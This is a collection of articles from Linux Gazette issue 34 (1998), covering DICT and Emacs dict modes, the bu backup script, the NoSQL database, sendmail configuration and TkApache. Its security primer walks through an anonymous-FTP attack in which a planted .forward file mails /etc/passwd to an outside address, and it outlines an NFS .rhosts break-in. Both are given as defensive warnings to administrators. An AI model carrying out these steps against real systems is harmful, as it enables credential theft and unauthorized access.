All references to Mr. Gates are purely intentional.


Copyright © 1998, Bill Bennet
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


Dict Continued

By


Last month I wrote about the DICT client-server protocol, a GPL-licensed system for looking up words in a variety of dictionary databases. I received some feedback from Rik Faith, DICT's primary developer, in response to my statements concerning the server's memory usage. Here is a quote from the message:

In your review, you mention that dictd requires a lot of memory to run, and suggest that people may not want to run the service all of the time. First, since dictd memory maps all of the files that it uses, ps may show that it is "using" far more memory than it actually is. I suspect that this may vary between kernel versions and ps, depending on how mmap'd memory is reported. Second, dictd doesn't do anything when it is waiting for a socket connection, so the memory it uses will be swapped out over time. Hence, I think it should be fine to start dictd at boot time and to leave it running -- I do this on my underpowered laptop and it works out ok in the sense that dictd doesn't use any resources when it is not responding to queries. If you happened to notice a situation where a waiting dictd is using cpu time, then that's a bug that I'd like to fix.

Thanks for your review of dict-related software -- I hope we can improve dictd and related tools a great deal over the next 6-12 months.

I was curious about the dictionary index files and just how they had been generated. In response to my query, Faith responded:

We currently write one-off scripts for each input database. These sources are all distributed on the ftp site. We are moving toward a dictionary interchange format (DICF) from which indexes will be automatically generated. But one-off scripts will still be required to convert the databases into DICF format. We expect, however, that a large amount of new material will be written directly in DICF. Our plan was to have DICF ready by 4Q1998, but this schedule may slip.

When I first began to use the DICT system, it occurred to me that an Emacs mode would be useful, so that a keystroke would open up a window showing definitions of the word under the cursor. Some time later I was browsing the gnu.emacs.sources newsgroup and happened to find two independently developed dict.el files, both functional but with slightly different features.

Alexander Vorobiev's version was the first one I tried. It works well under both GNU Emacs and XEmacs. This dict.el doesn't have any mouse bindings included, but does have a feature I appreciate: rather than directly sending the input word to the dictd server, the word first appears in the mini-buffer at the bottom of the screen, allowing it to be edited first. For example, this can useful if you would like the singular rather than the plural form of a word defined, or if the definition of a phrase is sought.

The other dict.el was written by Shenghuo Zhu. This one also will work on both emacsen, but the mouse-binding (button two looks up the word under the cursor) works only with GNU Emacs, though it probably wouldn't be too difficult to adapt it to XEmacs. Syntax-highlighting for GNU Emacs is also included.

Both modes allow a keystroke combination to be set for looking up a word; I've been using Control-c-Enter. Since the two files are small, I've bundled them into one gzipped tar archive and included them with this issue of the Gazette. You can find the file here. Instructions for installation of the modes can be found near the beginning of each file. In the archive you will find that one of the modes has been renamed dict2.el; before using that mode it should have its original name, dict.el, restored.

Dict-mode can even be used as a substitute for the Emacs Ispell spell-check interface. If a misspelled word is passed to the dictd server, a response such as this will be generated:


No definitions found for "arcive", perhaps you mean:
web1913:  Archive  Argive  Arrive
wn:  archive  Argive  arrive
foldoc:  archive

Of course Ispell is more suitable for spell-checking an entire buffer, but if a single word's spelling is doubtful, dict-mode offers an alternate solution.


Last modified: Wed 28 Oct 1998


Copyright © 1998, Larry Ayers
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


How Not To Re-Invent The Wheel

By


Introduction

With all of the excitement lately about various software firms planning Linux ports of their products, it's easy to lose sight of the great power and versatility of the unsung small utilities which are a part of every Linux distribution. These tools, mostly GNU versions of small programs such as awk, grep and sed, date back to the early pioneer days of Unix and have been in wide use ever since. They typically have specialized capabilities and become especially useful when they are chained together and data is piped from one to another. Often a shell script serves as the matrix in which they do their work.

Sometimes a piece of software native to another operating system is ported to Linux as an independent unit without taking advantage of pre-existing tools which might have reduced the size of the program and reduced memory usage. It's always a pleasure to happen upon software written with an awareness of the power of Linux and its native utilities. Bu is a backup program and NoSQL is an ASCII-table relational database system; what they have in common is their usage of simple but effective Linux tools to accomplish their respective tasks.


Shell-script Backups With bu

Making a backup of the myriad files on a Linux system isn't necessary for most stand-alone single-user machines. Backing up configuration and personal files to floppies or other removable media is normally all that is necessary, assuming that a recent Linux distribution CD and a CDROM drive are available. The situation becomes more complex with multi-user servers or with machines used in a business setting, where the sheer number of irreplaceable files makes this simple method impractical and time-consuming; in these cases the traditional method in the unix world has been to use cpio or another archiving utility to copy files to a tape drive. Though the price of hard disks has plummeted in recent years while their capacity has ballooned, reliable tape drives capable of storing the vast amounts of data a modern hard-disk can hold are still quite expensive, sometimes rivalling the cost of the computer they protect from loss of data.

Vincent Stemen has developed a small backup utility called bu which is shell-based and makes good use of standard Linux utilities such as cp and sed. Rather than being intended for backups to tape or other streaming device, bu is designed to mirror files on another file-system, preferably located on a separate hard drive.

Bu is just a twelve kilobyte shell script along with a few configuration files. It's remarkably capable; compare this list of features with those of other backup utilities:

Bu in its earlier versions used cpio extensively, but due to a problem with new directory permissions cp is the main engine of the utility now. Cp -a used by itself can be used to bulk-copy entire filesystems to a new location, but the symbolic links would have to be dealt with manually, which is time-consuming. Also missing would be the ability to automatically include and exclude specific files and directories; bu refers to two configuration files, /usr/local/backups/Exclude and /usr/local/backups/Include, for this information.

This small and handy utility isn't intended to completely supplant traditional tape-drive backup systems, but its author has been using bu as the basis of a backup strategy involving several development machines and several gigabytes of data. Bu can be obtained from this web-page; be sure to read the white paper included in the distribution which details the rationale behind the utility.


The NoSQL Relational Database

Carlo Strozzi (a member of the Italian Linux society) has developed a relational database management system (RDBMS) which uses tab-delimited ASCII tables as its data format. NoSQL is a descendant of an RDBMS developed by Walter W. Hobbs (of the RAND Organization) called RDB. The commercial product /rdb sold by Revolutionary Software is similar, but uses more compiled C code for greater speed.

Carlo Strozzi had this to say about his motivation for developing NoSQL (excerpted from the documentation):


Several times I have found myself writing applications that
needed to rely upon simple database management tasks. Most
commercial database products are often too costly and too
feature-packed to encourage casual use. There are also plenty of
good freeware databases around, but they too tend to provide far
more that I need most of the times, and they too lack the
shell-level approach of NoSQL. Admittedly, having been written
with interpretive languages (Shell, Perl, AWK), NoSQL is not the
fastest DBMS of all, at least not always (a lot depends on the
application).

The philosophy behind these database systems is well-expressed in an article titled A 4GL Language, which was written by Evan Schaffer and Mike Wolf, founders of Revolutionary Software. The paper originally appeared in the March 1991 issue of the Unix Review; a Postscript version is included with the NoSQL documentation. Here is the abstract:


There are many database systems available for UNIX. But almost
all are software prisons that you must get into and leave the
power of UNIX behind. Most were developed on operating systems
other than UNIX. Consequently their developers had very few
software features to build upon, and wrote the functionality they
needed directly, without regard for the features provided by the
operating system. The resulting database systems are large,
complex programs which degrade total system performance,
especially when they are run in a multi-user environment.

UNIX provides hundreds of programs that can be piped together to
easily perform almost any function imaginable. Nothing comes
close to providing the functions that come standard with
UNIX. Programs and philosophies carried over from other systems
put walls between the user and UNIX, and the power of UNIX is
thrown away.

The shell, extended with a few relational operators, is the
fourth generation language most appropriate to the UNIX
environment.

The complete article is well worth reading for anyone who has ever wondered just why Linux software is different than that used with mainstream operating systems, and why GUI software has only recently began to become common.

NoSQL incorporates the ideas presented above. A major difference between Walter W. Hobbs' RDB database and NoSQL is that NoSQL uses awk extensively to perform tasks handled by perl in RDB. Awk is a more specialized tool with a much smaller memory footprint, and since the data-pipelining which is the essence of these relational database management systems requires repeated invocation of their respective interpreters, NoSQL exerts less of a strain on a system's resources, especially important in a multi-user environment.

After installing the package (no compilation is involved) a new subdirectory under /usr/local/lib called nosql will be created and populated; it will have these subdirectories:

awk
contains several awk scripts which are responsible for most of the table-manipulation jobs

doc
contains both Postscript and HTML versions of the readable and complete NoSQL documentation, as well as a Postscript version of the Schaffer and Wolf article from the Unix Review

mylib
an empty directory for new scripts and programs

perl
perl scripts which perform other NoSQL functions

sh
shell scripts which act as wrappers for the awk and perl scripts.

The entire subdirectory occupies just under 600 kb., most of which is documentation.

After installing the files, the only other step needed before trying out the database is setting three environment variables. Here are three lines from my .zshenv file (bash users should have these lines in the .bash_profile file):


export NSQLIB=/usr/local/lib/nosql
export NSQSH=/bin/ash
export NSQAWK=/usr/bin/mawk

Carlo Strozzi recommends using ash rather than one of the larger and more powerful shells such as bash or zsh; ash uses less memory. and since the shell is repeatedly invoked while using NoSQL the upshot will be a noticeable increase in speed and a reduction in memory requirements.

Since there is no compiled code in the package, NoSQL should run on any machines which have awk and perl available; in other words the database isn't Linux-centric. The ASCII format of the data tables is also very portable, and can be manipulated by text editors and common filesystem tools. Data can be extracted from tables by means of various "operators" via input-output redirection (e.g., pipes, STDIN and STDOUT). The only limits on the amount of data which can be handled are in the machine running NoSQL; the installed memory and processor speed are the limiting factors.

As the name implies this is not an SQL database, which should make NoSQL more accessible to users lacking SQL expertise. I don't know SQL at all and I found the basic commands of NoSQL easy to learn. All commands are executed as parameters of the nosql shell script. Here's an example NoSQL table:


Name       Freq        Height      Season
----       ----        ------      ------
laccaria   27          6           Fall
lepiota    5           8           Summer
amanita    42          7           Summer
lentinus   85          5           Spring-Fall
morchella  45          6           Spring
boletus    65          5           Summer
russula    75          4           Summer

Single tabs must separate the fields from each other, even the spaces between the groups of dashes on the dashed separator line must be single tabs. An alternate format for the tabular data is the list; the above table can be converted to this format with the command

nosql tabletolist < [filename]

The results look like this:



Name    laccaria
Freq    27
Height  6
Season  Fall

Name    lepiota
Freq    5
Height  8
Season  Summer

Name    amanita
Freq    42
Height  7
Season  Summer

Name    lentinus
Freq    85
Height  5
Season  Spring-Fall

Name    morchella
Freq    45
Height  6
Season  Spring

Name    boletus
Freq    65
Height  5
Season  Summer

Name    russula
Freq    75
Height  4
Season  Summer

If the above table were named pilze.rdb, either the command

nosql istable < pilze.rdb

or

nosql islist < pilze.rdb

would ask nosql to check the table or list format's validity, depending on which format is being checked. Another command,

nosql edit < pilze.rdb

will open the file in the editor defined by the EDITOR environment variable (often set to vi by default). A file in table format is automatically converted into the vertical list format for easier editing, then changed back into a table when exiting the editor. When the file is saved or closed NoSQL will automatically check the validity of the format and give the line numbers where any errors occur. This seemingly obsessive concern with correct format isn't mere pedantry; the various NoSQL operators which manipulate and extract data need to be able to quickly distinguish headers from data and data-fields from each other, and single tabs are the criteria.

There are over forty operator functions available, some of which extract or rearrange fields while others are used to generate reports. Their names are more-or-less mnemonic, such as inscol and addcol, which are used to insert a column into a table, respectively on the left- or right-hand side. Other operators index and search tables. Examples of typical usage (i.e., connecting NoSQL commands with pipes) are included in the documentation.

As with any Open-Source software, it's hard to tell how many people or organizations are using it. In an e-mail, I asked Carlo Strozzi for examples of real-world usage of NoSQL; he replied that he has been using it quite a bit for database-backed CGI scripts for the WWW. He also stated that several companies in Italy are using it internally. Carlo Strozzi works for IBM in Italy, and he has developed several web applications backed by NoSQL; three of the publicly accessible pages are:

Fortune companies and people profiles

Classifieds - this is in Italian

Car classifieds, in Italian

The latest version of NoSQL can be obtained from this FTP site.


Last modified: Thu 29 Oct 1998


Copyright © 1998, Larry Ayers
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


Updates and Corrections

By


Introduction

I've accumulated a few updates to past articles and reviews, presented here in reverse chronological order. By the way, I appreciate the e-mail I receive from LG readers; keep it coming!


The Keyboard Practicer

Last month, in the second of two articles about typing tutor programs I included the Tcl source for a program by Satoshi Asami called Keyboard Practicer. It turns out that the version I had didn't include the licensing information, which follows:


/*-
 * Copyright (c) 1991-1998 Satoshi Asami
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS
* IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE
* AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
* WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

The updated archive (which doesn't include any changes other than the inclusion of the above license) is available from this FTP site.


Typist

A couple of issues ago I wrote about a console keyboard tutor called Typist, which at that time was in Sunsite's /pub/Linux/Incoming directory. I've received e-mail inquiries as to its current location, which isn't obvious. The new location is here.


TkDesk

After a long hiatus, Christian Bolik has released a new version of his featureful file-and-desktop manager TkDesk. I reviewed a much earlier release back in 1996 (LG #8), and in the several releases since then the application has improved and matured. Another factor which has changed since 1996 is the typical desktop machine running TkDesk. The application felt a trifle sluggish on my old, low-memory 486, but on a reasonably recent Pentium-based system TkDesk runs well. Aside from being a versatile and configurable file-manager, TkDesk occupies a sort of middle ground between the typical miscellaneous collection of Linux apps and a full-fledged desktop manager such as KDE or Gnome. Its integration with Netscape and XEmacs is particularly useful, and the button-bar is one of the most configurable and useful I've seen for X-Windows.

TkDesk still won't run with Tcl/Tk 8.0, but now that incrTcl (the C++ object-oriented extension to Tcl) has been updated to work with the newer Tcl/Tk releases, the release of a version of TkDesk which uses these libraries can't be too far off. The new 1.1 release of TkDesk works fine with Tcl7.6/Tk4.2 for the time being. The TkDesk homepage is here.


Window Managers

Two of the most promising new window-managers available for X have been undergoing rapid development lately. Marco Macek's Icewm is getting better with each release, and the recent betas have been including GNOME-specific features. This won't affect those users who aren't using GNOME, as the configure script detects a GNOME installation and disables these features if CNOME isn't installed. Check out the icewm home-page for the latest news.

Brad Hughes has been working hard to squelch bugs and further refine his Blackbox window-manager. He has successfully converted Blackbox so that it uses the GNU autoconf system instead of an Imakefile type of configuration; in other words it now uses a configure script to generate a custom-tailored makefile, which in some cases will make Blackbox easier to compile.

The Blackbox home-page is here.


Last modified: Wed 28 Oct 1998


Copyright © 1998, Larry Ayers
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


Securing Your Linux Box

By


With Linux becoming widespread in the work environment, the security of the individual machines must be considered. Machines running Linux can be networked easily, creating the potential risk of unauthorized users gaining access. This is particularly true if your Linux installation is straight out of the box. I will give a brief introduction to securing your Linux box and making your network environment a safer place for both your data and the people who use use it.

``You are only as strong as the weakest link in your defense,'' says the Chinese proverb, and this is certainly true in the field of computer security. If you forget to patch that newly downloaded version of lpd all your walls can come crumbling down, even with the securest system in the world. Always be cautious when installing any new software. If you are using Linux only as a desktop machine at home and you connect to the Internet via a modem, you do not have to worry so much. On the other hand, if you are running a mission-critical server wired into the Net, I would strongly advise checking out the security history of any piece of software that you wish to install (remembering that famous version of Sendmail).

Several mailing lists and many web pages offer extensive help on Linux security. The information is out there, you just need to go and harvest it. If you don't have the time, patience or know-how, contact a security consultant to take a look at your system setup and discover any potential weak spots. Usually security consultant firms have their own Tiger Teams who for a fee will attempt to make the walls crumble around your computer(s). Their object is to get into your system under a certain period of time and some even refund your money if they are unsuccessful. Tiger Teams are a valuable asset to security-conscious companies. Since Tiger Teams cost quite a bit, I would suggest you break into your own machines. This exercise can save you money, and give you a better understanding of the structure and different abstract layers of Linux in the process.

The starting point of our Linux security tour is the password. Many people keep their entire life on a computer and the only thing preventing others from seeing it is the eight-character string called a password. Not something one would call completely reliable. Contrary to popular belief, an uncrackable password does not exist. Given time and resources all passwords can be guessed either by social engineering or by brute force.

Since password cracking can be a time- and resource-consuming art, make it hard for any cracker who has grabbed your password file. Running a password cracker on a weekly basis on your system is a good idea. This helps to find and replace passwords that are easily guessed or weak. Also, a password checking mechanism should be present to reject a weak password when first choosing a password or changing an old one. Character strings that are plain dictionary words, or are all in the same case, or do not contain numbers or special characters should not be accepted as a new password.

A safe password can be constructed by taking the first letter of your favorite phrase, quote or sentence and adding special characters. For example, suppose my favorite phrase is, ``the quick brown fox jumped over the lazy dog,'' by taking the first letter of every word, I'd end up with tqbfjotld. Next, I'd add special characters and perhaps squeeze in the year resulting in a password of 9tqbf!jotld8. This is a much secure than the name of your spouse or child.

Word lists containing hundreds (if not thousands) of words that could be fed to a password cracker are available on the Internet. Some contain only names, so cracking the password ``maggie'' is quite trivial while the likelihood of 9tqbf!jotld8 appearing in one of those lists is quite slim. However, even though if our proposed password is not likely to appear in a word list, more advanced cracker programs come with a feature called Incremental Cracking Mode which means that every possible permutation is tried. The user gives it the minimum and maximum number of letters in a password, upper case or lower case, inclusion of special characters and numbers, and the passwords cracker does the rest. Granted, it could take a lot of time and resources, but it is possible.

Next, be aware of the services running on your system. Most distributions of Linux have HTTP, FTP, SMB, Sendmail and various other services running as default. Not everyone needs a web server running so why not get rid of it--it takes up resources and can be a potential security risk. To terminate web services, type:


kill -9 
To find out the process ID(s) of a certain daemon or service, type:

ps aux | grep 
Also, comment these daemons out of your start-up scripts so that they will not restart after a reboot. Unused services can let others gain information about your system and they could also pose as a security risk.

Another thing to avoid is the use of .rhosts files, as they are a favorite of crackers. The .rhosts files contain names of systems on which you have an account. When you use TELNET to log in to a system, the system checks its .rhosts file and if your machine name is found, it gives you access without the need for a password.

For more information about the .rhosts file, look in your favorite Linux or System Administration manual. One of the most famous exploits involving the .rhosts file is the misconfiguration of the Network File System (NFS). First the hacker checks for any exported file systems on your machines (to check, type: showmount -e), and if any are world writable. Next he remotely mounts your file system and places an .rhosts file into a user's directory. Last, the hacker uses TELNET to log into your machine as the that user, and your system is now compromised. The moral of this story: leave the configuration of the nfsd to someone who is more experienced than you or read the documentation carefully.

Another similar hack involves the misconfiguration of a popular service commonly found on the Internet; anonymous FTP. The first, and obvious method, of gaining unauthorized access via anonymous FTP is by letting the public have access to your password file. Granted all passwords are stored in encrypted form, but remember we've already shown crackers can get by this. Another way to gain access to the local password file is by exploiting the writeability of the /ftp directory. Look at these simple steps:

  1. Create a fake .forward file that has the following command in it:

        |/bin/mail [email protected] < /etc/passwd
  1. Connect to the victim machine via FTP and log in as user FTP.
  2. Enter any password you wish.
  3. Upload the .forward file you have created in Step 1.
  4. Log out and send mail to [email protected].
  5. Sit back as victim.machine.com e-mails you a copy of its local password file.
Clearly, an easy way to get a password file. The heart of this hack lies in a simple mistake made by the system administrator; so, never make the /ftp directory writable by user anonymous. Setting up an anonymous FTP server is an art of its own, but it will help to remember these simple rules:

One last thing to remember is that the system logs are your friends. The logs are the only way to find out what is/has/will be happening on your system, so keep reading them. Also, make sure that they are not being tampered with by intruders or by fellow system administrators.

As Linux finds its way into more and more corporate environments, it is a crucial step to keep users out of each other's files and patch all the holes that might be utilized by hackers. With the notion of interconnectivity, industrial espionage will also be on the rise. With simple preventative measures and user education, the workplace can be a safe place for your secrets.


Copyright © 1998, Peter Vertes
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


Sendmail Made Easy!

By


All Linux distributions come with a Mail Transfer Agent (the program that does the routing and sending of the messages. The daddy of them all is sendmail (http://www.sendmail.org/).

sendmail is usually preconfigured, but if you need to set up a special situation (for example UUCP), it can become quite a nuisance. The reason for this is that at the initial writing of sendmail the configuration language was designed to parse quickly at the expense of being cryptic. I looked at a sendmail.cf in 1987 and didn't look again for 10 years.

smail is easier to understand and has always had the nice feature of batching messages, running the batches through gzip and sending the jobs off via UUCP. Saved me quite a lot of money in phone bills over the years.

However, a year and a half ago I found a package called BSMTP (Batched Simple Mail Transport Protocol) for taking care of the batch-gzipping stuff. BSMTP is a package which is used with UUCP. sendmail uses the SMTP Protocol if sending or reeiving mail via TCP/IP, but you can also feed mail into sendmail directly using this protocol. Now this package will take outgoing mail, put many messages in batches with SMTP commands inserted between messages, gzip the batches and hand them to UUCP for transport. On the other end the process is reversed, uucp receives, hands to an uncompressor which feeds to sendmail. This results in a compression of better then half. Using advanced features of the uucp on Linux you can achieve very high throughputs. BSMTP works with both smail and sendmail and has a macro package which makes sendmail configuration much easier. I like to tinker so I tried it. It took about a weekend to get sendmail working with BSMTP/UUCP. Once I had figured out the basics, it became much easier, I only needed about an hour to set it up for my leased line.

Since you have Linux, you have all the tools required. If not, install them from your distribution. I'll assume you have a working DNS with MX entries for our system and are connected by a leased line. Install the latest sendmail and sendmail-cf RPMs in the /usr/lib/sendmail-cf directory.

Consider the following few lines in a file called linux.mc located in /usr/lib/sendmail-cf/cf:


divert(-1)
OSTYPE(linux)
FEATURE(use_cw_file)
define(`confCW_FILE', `-o /etc/sendmail/sendmail.cw')
FEATURE(mailertable,`hash -o /etc/sendmail/mailertable.db')
FEATURE(local_procmail)
define(`STATUS_FILE',`/etc/sendmail/sendmail.st')
MAILER(procmail)
MAILER(smtp)
It's rather cryptic--or is it?

Run this file through the m4 command by typing:


m4 ../m4/cf.m4 linux.mc > sendmail.cf
It produces a sendmail.cf of approximately 1200 lines (still unreadeable to me) which has been in production use on my system.

Now let's have a look at what those lines mean.


# divert(-1)
This line is a directive to the macro processor which I have never bothered to understand. It has something to do with suppressing newline characters.


OSTYPE(linux)
Now, that's fairly easy, right? Well, what it doesn't tell you is that the local delivery program mail.local from the sendmail distribution needs to be in /bin or your mail will disappear without a trace.


FEATURE(use_cw_file)
define(`confCW_FILE', `-o /etc/sendmail/sendmail.cw')
What on earth is a CW file?

I receive a lot of mail to the address of [email protected]; however, the host name is linux.lisse.na. No problem, we have an appropriate MX entry pointing lisse.na to linux.lisse.na, right? Wrong. You must tell sendmail the names under which it can receive mail on the local host. For example:


lisse
lisse.na
linux
linux.lisse.na
When doing this is overlooked, sendmail sends an error message which is somewhat misleading. The bouncing message has the following Subject: line:
 
Subject: Returned mail: Local configuration error
And the MX list line is what is confusing:
 
   ----- Transcript of session follows -----
554 MX list for nws.com.na. points back to linux.lisse.na
554 [email protected]... Local configuration error


FEATURE(mailertable,`hash -o /etc/sendmail/mailertable.db')
This line is only required if you have special delivery situations. For example, to use the BSMTP package to deliver mail for Triple A, Inc. via the UUCP neighbour bbbbb, set up an MX entry in the DNS and write something like this in the mailertable file:


.aaa.com.na     bsmtp:bbbbb
aaa.com.na      bsmtp:bbbbb
A TAB character is in between the pairs, and you must run a program from the sendmail package called makemap on the file mailertable to produce the binary database file mailertable.db. For example:


makemap hash < mailertable mailertable
There are other database systems (for example, dbm) but let's not complicate matters.


FEATURE(local_procmail)
This line redefines the local mailer to be procmail. You most definitely want that.


define(`STATUS_FILE',`/etc/sendmail/sendmail.st')
This line defines the status file. Make sure you have created this directory as root.


MAILER(procmail)
procmail was written by Stefan van der Berg at my alma mater and deserves its own article. In short it is the local delivery program. Its strength lies in its message filtering capabilities. Very nice for those mailing lists.


MAILER(smtp)
Please note that I have left out the bsmtp entry that would be required, if you had used a BSMTP entry in the mailer table. If you had a UUCP neighbour, you'd need a mailer entry too which must come after smtp.

Now, test this configruation file, copy it to the /etc directory after making a backup copy of the old one and restart sendmail. As root, I use the command:


killall -HUP sendmail
I did not show you how to set up sendmail for UUCP, BSMTP, anti-SPAM or virtual domains. However, now that you have mastered the basics, it will be fairly easy.


Copyright © 1998, Eberhard W. Lisse
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


TkApache

By


I've been using the Apache Web server for several years now, both to serve my own Website as well as commercial sites. In all this time, this small, fast server has never failed me. While I'm perfectly happy with command line tools being a UNIX freak and all, let's face it - this is a Windows mentality world. People like GUI interaction with their programs. This has been a long standing argument over the Apache Web server - the lack of a GUI.

There are currently several projects on the Internet to provide such a front-end for Apache. Why write another, you ask? Out of the projects that are currently available, most lack an easy to use layout, support all of Apache's features in an open, modular way or both. It is my vision to create a tool that can run on many platforms with as little fuss on the part of the user as possible and have a great growth potential.

Version 1.0 launched the afternoon of October 16th, 1998. Within the first 24 hours, it was downloaded 1,036 times and the TkApache Web page had 1,400 visitors. Not staggering numbers, but since then it's been downloaded somewhere around 150 times per day. This version was originally going to have some additional features but the other developer and I, Lance Dillon, decided to concetrate on finishing the core features and doing some quick bug testing to get it released in time for ApacheCon in San Francisco that week. That and the Emails to the nature of "where can I get it?!" streaming in at a rate of 30 or so a day...

Other neat features include callouts to Netscape to view the HTML documentation (will sport context sensitive, internal and browser-independant help in future versions), a setup/install window and a tail window. The tail window is like the UNIX "tail -f" command, which allows you to watch your log files in real-time. TkApache allows you to monitor your access and error logs.

So where is TkApache headed? Our next goal is version 2.0 with maintenance releases along the way to fix bugs as we discover them. There are some lofty goals for this next version, some of which can already be seen in the code for the initial version. This is the support of modules. We have envisioned an interface that can include user submitted or internally developed modules to support the vast number of Apache modules and add-ons like SSL, PHP and mod_perl, among others. Also planned is performance graphing of CPU/RAM loads, number of processes, Website visitors, etc. and virtual host support. The user interface will evolve along with it to handle the load of information that must be dealt with, formerly taking up three rather good sized configuration files. I find GUI design to be a lot of fun and a pet peeve of mine. It's got to look good and be usable or else it's just in the way.

What makes it tick, and how does all this relate to Perl? TkApache is written entirely in a combination of Perl and the Tk toolkit, known as PerlTk. Originally I started with Tcl/Tk and Perl, but it was a total hack. While I loved working with the Tk toolkit, I wasn't to familiar with, or interested in Tcl. Perl was more my speed, and when I became aware of the PerlTk module, it was a perfect match for rapid prototyping. The GUI design is really fun to work on, although it can be frustrating sometimes, but it's really quite easy. The whole solution allows all of Perl's wonderful text handling to be used in dealing with all this text in the configuration files. Weighing in at over 8,000 lines of code - TkApache is very portable (there are some current items that make it less than optimal which will be addressed in a maintenance release) and should run on Macintosh or Windows, as well as any UNIX platforms without modification. We're trying to keep the module count down, only to make it easier for potential users to get up and running, although we do currently rely on Data::Dumper and some File::Copy routines (all part of 5.005+).

Do stop by the TkApache Web site and see what you think. If you're familiar with Perl and/or Tk and would like to contribute to the project, you're very welcome to. Or, if you'd like, we're also happy to receive feedback on it. There's screenshots and documentation available online.

Michael Holve [email protected]

TkApache Web Site: http://eunuchs.org/linux/TkApache/index.html


Copyright © 1998, Michael Holve
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


Linux Gazette Back Page

Copyright © 1998 Specialized Systems Consultants, Inc.
For information regarding copying and distribution of this material see the Copying License.


Contents:


About This Month's Authors


Steve Adler

Steve was born in Mexico City and received his education in the U. S. He has a Ph.D. in Physics from the State University of NY. His first job was working with a medical imaging group at the University of Texas medical school, writing software in the development effort to build a positron emission tomography camera. Since 1995 he has been a staff scientist for the physics department at Brookhaven National Laboratory. He is currently moving out of high energy physics into nuclear physics by joining the PHENIX experiment at the Relativistic Heavy Ion Collider, where he'll be working on the data acquisition system. Besides physics and computing, he engages in roller blading, cycling, camping and travel.

Paul Anderson

Paul is a computer hobbyist primarily, working on the FreeWorld BBS software(http://www.freeworldbbs.org) for Linux in his off-time and setting up networks with some system administration for a web-hosting service.

Larry Ayers

Larry lives on a small farm in northern Missouri, where he is currently engaged in building a timber-frame house for his family. He operates a portable band-saw mill, does general woodworking, plays the fiddle and searches for rare prairie plants, as well as growing shiitake mushrooms. He is also struggling with configuring a Usenet news server for his local ISP.

Bill Bennet

Bill, the ComputerHelperGuy, lives in Selkirk, Manitoba, Canada; the "Catfish Capitol of North America" if not the world. He is on the Internet at www.chguy.net. He tells us "I have been a PC user since 1983 when I got my start as a Radio Shack manager. After five years in the trenches, I went into business for myself. Now happily divorced from reality, I live next to my Linux box and sell and support GPL distributions of all major Linux flavours. I was a beta tester for the PC version of Playmaker Football and I play `pentium-required' games on the i486. I want to help Linux become a great success in the gaming world, since that will be how Linux will take over the desktop from DOS." It is hard to believe that his five years of university was only good for fostering creative writing skills.

Howard Cokl

Howard is a PC Technician and ad-hoc UNIX Administrator. He has used Linux in a number of different applications including ISP, DHCP, etc. He is working on building a Beowulf style computer. He implemented this CD-ROM server and can be reached at [email protected].

Jim Dennis

Jim is the proprietor of Starshine Technical Services. His professional experience includes work in the technical support, quality assurance, and information services (MIS) departments of software companies like Quarterdeck, Symantec/ Peter Norton Group, and McAfee Associates -- as well as positions (field service rep) with smaller VAR's. He's been using Linux since version 0.99p10 and is an active participant on an ever-changing list of mailing lists and newsgroups. He's just started collaborating on the 2nd Edition for a book on Unix systems administration. Jim is an avid science fiction fan -- and was married at the World Science Fiction Convention in Anaheim.

Scott Field

Scott has been programming and administering mainframes and PCs for 15 years professionally. He has used C++ for about 5 years, and did COBOL prior to that. He is currently working as a C++ contractor in Sydney. Outside work he enjoys spending time with his wife and three year old daughter. He is now looking for an STL algorithm that likes renovating houses.

Michael J. Hammel

A Computer Science graduate of Texas Tech University, Michael J. Hammel, [email protected], is an software developer specializing in X/Motif living in Dallas, Texas (but calls Boulder, CO home for some reason). His background includes everything from data communications to GUI development to Interactive Cable systems, all based in Unix. He has worked for companies such as Nortel, Dell Computer, and Xi Graphics. Michael writes the monthly Graphics Muse column in the Linux Gazette, maintains the Graphics Muse Web site and theLinux Graphics mini-Howto, helps administer the Internet Ray Tracing Competition (http://irtc.org) and recently completed work on his new book "The Artist's Guide to the Gimp", published by SSC, Inc. His outside interests include running, basketball, Thai food, gardening, and dogs.

Michael Holve

